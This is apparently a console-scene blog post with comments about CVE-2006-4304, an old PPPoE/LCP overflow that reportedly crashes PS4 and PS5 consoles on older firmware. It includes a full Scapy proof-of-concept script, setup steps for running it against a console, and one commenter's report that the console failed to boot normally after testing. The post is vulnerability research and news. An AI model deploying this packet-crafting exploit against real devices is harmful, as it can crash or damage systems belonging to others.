Is an 18-year old vulnerability the key to the next PS5/PS4 Jailbreak?
What initially looked like a troll might turn out to be an actual PS4/PS5 vulnerability. While people shouldn’t get their hopes up just right now as this might fizzle, it’s more interesting than it initially looked on the surface.
Discussions about an 18 year old CVE have been making the rounds of PS4/PS5 hacking discords, forums, and Twitter over the past few days. Some people have been claiming that a Network bug disclosed in 2006 could be leveraged to Jailbreak recent PS4 and PS5 firmwares, and that this might even be the vulnerability (or one of the vulnerabilities in a chain) used by TheFloW in one of his most recent PlayStation bug bounties.
Early tests seem to indicate that a crash is indeed present in PS4 up to 11.00 included, and PS5 8.20 included. (Which would put the patch for this issue at firmwares PS5 8.40 and PS4 11.02)
I’ll be the first to admit I initially dismissed the original message as a troll, but it seems the claim has legs: a PoC (proof of concept) file has been circulating, and multiple people confirm it crashes their PS4 and PS5, up to the firmwares mentioned above. Now, a crash in itself is certainly not a vulnerability (let alone an exploitable one), but this means the claim is now leaving the “troll” territory and becomes worth looking into. And there’s more…
CVE From 2006 and PS4/PS5 crash PoC
Before people become overly excited, I’d like to say that this should still be considered as a rumor, or, at the very least, something that could fizzle, until more skilled devs actually dig into the issue. However, here’s what happened so far:
- An old CVE From 2006 (CVE-2006-4304) was initially reported by some anonymous user to be a “PS4/PS5 KEX” a few days ago. Multiple people, including myself, initially dismissed the claim: “There’s no way a 18-year old FreeBSD 4 bug is present on the PS4 or the PS5, which are based on FreeBSD 9 or above”.
- However, several folks have tested the poc that’s been circulating (Please note that @Colek who provided this PoC on their github is not the person who initially made the claims) and have confirmed that it crashes their PS4/PS5 consoles, up to some specific firmwares (apparently up to PS4 11.00 and PS5 8.20 included).

Screenshots courtesy of hhk2003
What the CVE is about:
Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 through 4.0 beta before 20060823, and OpenBSD 3.8 and 3.9 before 20060902 allows remote attackers to cause a denial of service (panic), obtain sensitive information, and possibly execute arbitrary code via crafted Link Control Protocol (LCP) packets with an option length that exceeds the overall length, which triggers the overflow in (1) pppoe and (2) ippp.
This appears to be a bug in the Network stack of FreeBSD/NetBSD. Setting aside for a minute how crazy it would be that an 18 year old vulnerability is still present in modern consoles, at the very least this is an area of the code that we know TheFloW has been investigating a lot in the past (the only known PS5 Kernel exploit was from TheFloW and is related to the Network stack as well).
The poc:
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4 interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux packet = sniff(iface=interface, filter="pppoed", count=1) tag_value = packet[PPPoED][0].tag_list[1].tag_value payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value sendp(payload, iface=interface) packet = sniff(iface=interface, filter="pppoed", count=1) payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value sendp(payload, iface=interface) packet = sniff(iface=interface, filter="pppoes", count=1) payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" packet = srp1(Ether(payload), iface=interface) print(hexdump(packet)) payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256 # this number might be different, just a guess for i in range(20): sendp(payload, iface=interface)
Verdict: Is there a new vulnerability on the PS4/PS5?
A few thoughts come to mind:
- In my opinion, if a bug from a CVE has been fixed on some system, it should generally not crash that system after the patch. I understand that in some rare scenarios, a crash is the only way out, but in my experience, most bug fixes intend to handle an error case gracefully. A crash is not an exploit, but it is very interesting to see that this code actually crashes the PS4 and PS5
- A likely explanation, rather than an old bug surfacing, is a new one (or similar one) that happens to be triggered by taking a similar path in the code base.
- It is also possible that some bits and pieces of the PS4/PS5 Network stack are not based on FreeBSD, but some other PS4/PS5 specific code that might still have the issue due to not be part of FreeBSD patches.
- It is particularly interesting to me that some more recent firmwares do not crash. This implies that Sony have fixed some issue, or modified some code in that area, in recent firmwares (which was actually strongly hinted at when PS4 11.02 and PS5 8.40 were released). This is additional confirmation that this crash could be related to a recent vulnerability that was surfaced to Sony’s engineers (e.g. one of TheFloW’s bugs is not out of the question)
- Some people have confirmed that the buggy code does, or did, exist, at some point, in the PS4’s codebase. SlidyBat over at the PS5 R&D discord in particular says that there is indeed some function in the PS4 that seems to use the old buggy code:
Download and test the PoC
It is of course too early to tell if this could lead to anything on the PS4 and PS5, but for sure this looks way more interesting than I initially thought it did, a few days ago. We’re at the very early stages of this, and although this won’t be useful to anyone without the right skills to dig further, it probably doesn’t hurt for people to try and run the PoC on their PS4 and PS5.
Feel free to give it a try and report in the comments whether this crashed your console (and which firmware you’re on).
Please understand that in its current stage, this will only crash your console, and it’s not particularly obvious to set up: you’ll need some basic scripting skills. If you can’t follow the instructions on how to edit the script and run it, I’d strongly suggest you don’t sweat it.
- Get the Poc here: https://gist.github.com/RobbedColek/8b0bc9655adc6ad9564ad71453188e37
- Requires Python 3 and Scapy.
- Connect your PS4/PS5 directly to PC via LAN cable.
- Set up your PS4/PS5 for manual ethernet connection via PPPoE – insert any username/password.
- Update the “source”, “destination”, and “interface” details in the script, according to your home PC and target console. <– If you don’t know how to do that and can’t figure it out, stop right there, this thing isn’t for you and you will not be helpful
- Use “Test Internet Connection” on console.
- Launch script.
If it worked, it will crash your console.
Reference
- Original claim: https://wololo.net/2024/01/26/ps5-update-8-60-is-here-and-guess-what-dont-update/comment-page-1/#comment-6543161
- PoC for PS4/PS5: https://gist.github.com/RobbedColek/8b0bc9655adc6ad9564ad71453188e37
- CVE: https://www.cvedetails.com/cve/CVE-2006-4304/
- OpenBSD patch to fix the 2006 vulnerability: https://ftp.openbsd.org/pub/OpenBSD/patches/3.8/common/014_sppp.patch
As always I’ve tried to be accurate and precise in this article. If you notice something is missing or wrong, please let me know in the comments. Thanks
This is amazing. Good work everyone who, stepped in. Hopefully it wont be long, until a working BD-JB works. On PS4 11.00 and PS5 8.20 or lower.
Well written and clearly presented. Great post wololo! Hopefully this can come to fruition as an exploit. In the case that this is one of the unreleased exploits reported in the bounty program, what would the repercussions be if it became public before any disclosure on their part?
HAd a feeling that today may bi a big day and now this wow a vuln from 2006 thats awesome and funny
Very interesting read, extremely curious what this might bring
Wait, is the source code for the PS4 firmware leaked?
No but you can reverse engineer it. See: https://wololo.net/2023/09/04/ps4-ps5-reverse-engineering-101-the-basics-of-ps4-exploits/
Anon, my big brother from another mother, is a hero as always 😉
Wololo, write article about this coming PS4 modchip from BwE… This is big news! 🙂
https://twitter.com/BwE_Dev/status/1747142553726816565
I’m in wait and see mode on this. Knowing BwE, it will be a chip exclusively for repairmen, most likely an improvement over something that already exists (e.g. his own take on modded warfare’s reversible firmware chip: https://wololo.net/2023/07/26/revertible-firmware-ps4-by-modded-warfare-this-could-be-the-future-of-ps4-hacks/ ) and absolutely not what you, as a reader, expect when you think of a PS4 “modchip”
I’ll of course eat my words and publicly apologize if he releases something that’s actually groundbreaking.
It crashed my console once after which it keeps giving binary responses when sending packets, but doesn’t crash.
I hope there will be something with this.
I’m stuck on version 9.55
Espero que en algún momento @theflow y otros devs se una a las recompensas descentralizadas. . hackerOne es tacaño y está undiendo la próxima scene de ps5, y la verdad este trabajo es de puro amor pero la comunidad es demasiado tóxica aveces y no agradecen y en muchos casos ni dan las gracias a los Devs que hacen posible muchas cosas interesantes
is there ps4 11.02 jb i don’t understand
No. Just hope. Also, 11.02 is out of the equation for this particular crash. It’s for 11.00 and lower
If this is exploitable, this might be the first real use for BD-JB on the PS4. It has more rights in non-jailbroken state than the WebKit process, and raw socket access is one of the things that is still present there. It’s been patched in WebKit after the 7.5X exploits.
Do you know what the latest ps4 fw that can exploit BD-JB is?
https://t.co/Jo6cCkpZAu azif uploaded some payload enabler for 11.02 and said to make ur own exploit does this mean jb?
I tested the PoC two times and the ps4 only crashes on reboot/shutdown on firmware 10.01. If I try to reboot, the console will not power on afterwards and it will show the hard drive test on the next bootup. It seems to work.